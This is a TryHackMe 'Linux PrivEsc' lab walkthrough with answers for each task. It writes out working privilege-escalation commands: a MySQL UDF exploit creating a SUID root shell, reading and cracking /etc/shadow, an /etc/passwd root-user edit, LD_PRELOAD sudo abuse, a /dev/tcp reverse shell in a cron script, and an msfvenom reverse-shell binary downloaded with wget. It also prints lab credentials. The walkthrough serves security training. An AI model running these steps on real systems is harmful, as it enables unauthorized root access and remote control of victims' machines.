This is the write up for the room Linux PrivEsc on Tryhackme and it is part of the complete beginners path
Make a connection with VPN or use the attack box on Tryhackme site to connect to the Tryhackme lab environment.
Tasks Linux PrivEsc
Task 1
Deploy the machine attached to this room and connect to it with ssh user@<Machine_IP>
1.1 Run the “id” command. What is the result?
Type in the command
id
Answer: uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)
Task 2
Read all that is in the task. Basically, type in the following commands and understand the exploit
cd /home/user/tools/mysql-udf
gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
use mysql;
create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
\q
rm /tmp/rootbash
exit
Task 3
3.1 What is the root user’s password hash?
Type in the following command
cat /etc/shadow
Answer: $6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0
3.2 What hashing algorithm was used to produce the root user’s password hash?
John should automatically know this. But you can also get it using the tool hash-identifier or p[ast it in Hash Type Identifier – Identify unknown hashes
Answer: sha512crypt
Note: Hash identifier did not got it right. I got it from Hash Type Identifier – Identify unknown hashes
3.3 What is the root user’s password?
Save the hash in a file called hash.txt by typing in the following command
echo "$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0" > hash.txt
Now we are ready to crack the password with john. Type in the following command on your own kali machine
Task 4
Following along with the task. Remember best edit tool is nano
Task 5
5.1
Type in the following command to generated a new password called newpass
openssl passwd newpass
Now we are opening and editing /etc/passwd to add the generated hash
5.1 Run the “id” command as the newroot user. What is the result?
Answer: uid=0(root) gid=0(root) groups=0(root)
Task 6
6.1 How many programs is “user” allowed to run via sudo?
Type in the following command to see a list of all programs
sudo -l
Answer: 11
6.2 One program on the list doesn’t have a shell escape sequence on GTFOBins. Which is it?
Answer: apache2
Task 7
Read all that is in the task and following along
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c
sudo LD_PRELOAD=/tmp/preload.so awk
Task 8
Read all that is in the task and press complete
nano /usr/local/bin/overwrite.sh
#!/bin/bash bash -i >& /dev/tcp/YOUR_IP_HERE/4444 0>&1
on your kali machine
nc -nvlp 4444
Task 9
9.1 What is the value of the PATH variable in /etc/crontab?
Type in the following command to create the overwrite.sh file
nano overwrite.sh
add this to the file
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash
Make the file executionalble
chmod +x /home/user/overwrite.sh
Wait 60 second the type in
/tmp/rootbash -p
To get the answer of the question type in
cat /etc/crontab
Task 10
Create the shell first
msfvenom -p linux/x64/shell_reverse_tcp LHOST=YOUR_KALI_IP_ADRESS LPORT=4444 -f elf -o shell.elf
Now in the same directory we are going to start a web-browser
python3 -m http.server 80
Open a new terminal and start a listner by typing
nc -nlvp 4444
Go back to the machine of the room and type in
wget HTTP://<YOUR_KALI_IP>/shell.elf chmod +x /home/user/shell.elf
Now wait till the cronjob has started and see a shell popup
Task 11
Read all that is in the task and press complete
Task 12
Read all that is in the task and press complete
Task 13
Read all that is in the task and press complete
Task 14
Read all that is in the task and press complete
Task 15
Read all that is in the task and press complete
Task 16
16.1 What is the full mysql command the user executed?
Type in the following command to get the history of the user
cat .bash_history
Answer: mysql -h somehost.local -uroot -ppassword123
Task 17
17.1 What file did you find the root user’s credentials in?
if we type in ls we see one files called myvpn.ovpn
cat myvpn.ovpn
Notice /etc/openvpn/auth.txt
cat /etc/openvpn/auth.txt
Asnwer /etc/openvpn/auth.txt
Task 18
Read all that is in the task and press complete
Task 19
19.1 What is the name of the option that disables root squashing?
Answer no_root_squash
Task 20
Read all that is in this task and press complete
Task 21
Read all that is in this task and press complete
